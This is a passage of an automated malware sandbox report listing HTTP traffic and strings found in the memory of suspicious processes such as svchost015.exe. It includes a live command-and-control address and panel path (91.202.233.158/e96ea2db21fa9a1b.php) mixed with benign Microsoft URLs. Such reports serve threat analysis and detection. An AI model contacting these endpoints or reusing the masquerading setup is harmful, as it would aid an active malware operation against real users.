            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 3c 0b e9 f3 51 fa 91 ee af 36 d9 2f d9 e8 22 59 14 c1 d3 dd 9d 3c 83 66 5b 1b 90 11 9e 50 68 54 51 af 88 7c e1 7e ed 42 0e 1b 39 06 13 9c 3d a7 23 06 bc Data Ascii: #\6}Q<Q6/"Y<f[PhTQ|~B9=#
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:42:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:44:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 02 Sep 2024 09:45:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
            Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.158
            Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.158/
            Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.158/W
            Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000008.00000002.2317202796.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.php
            Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpB
            Source: svchost015.exe, 00000008.00000002.2317202796.0000000000D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpg
            Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.158/e96ea2db21fa9a1b.phpm
            Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.158/ws
            Source: svchost015.exe, 00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.158i
            Source: explorer.exe, 00000001.00000000.1766706025.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.drString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
            Source: explorer.exe, 00000001.00000000.1766706025.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: explorer.exe, 00000001.00000000.1766706025.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.drString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.drString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
            Source: explorer.exe, 00000001.00000000.1766706025.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.drString found in binary or memory: http://ocsp.sectigo.com0
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.drString found in binary or memory: http://ocsps.ssl.com0
            Source: explorer.exe, 00000001.00000000.1766257805.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1767359707.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1765907916.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: explorer.exe, 00000001.00000000.1768511521.000000000C975000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drString found in binary or memory: http://www.x-ways.net/order
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drString found in binary or memory: http://www.x-ways.net/order.html-d.htmlS
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drString found in binary or memory: http://www.x-ways.net/winhex/license
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drString found in binary or memory: http://www.x-ways.net/winhex/license-d-f.htmlS
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drString found in binary or memory: http://www.x-ways.net/winhex/subscribe
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drString found in binary or memory: http://www.x-ways.net/winhex/subscribe-d.htmlU
            Source: explorer.exe, 00000001.00000000.1768511521.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
            Source: explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
            Source: explorer.exe, 00000001.00000000.1765272332.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
            Source: explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 00000001.00000000.1766706025.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 00000001.00000000.1766706025.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
            Source: explorer.exe, 00000001.00000000.1763964756.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1764464126.0000000003700000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 00000001.00000000.1766706025.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
            Source: explorer.exe, 00000001.00000000.1766706025.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 00000001.00000000.1766706025.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
            Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
            Source: explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.7.drString found in binary or memory: https://github.com/tesseract-ocr/tessdata/
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000001.00000000.1765272332.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
            Source: explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: D931.exe, 00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, D931.exe.1.dr, svchost015.exe.7.drString found in binary or memory: https://sectigo.com/CPS0
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000001.00000000.1765272332.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000001.00000000.1768511521.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
            Source: explorer.exe, 00000001.00000000.1768511521.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
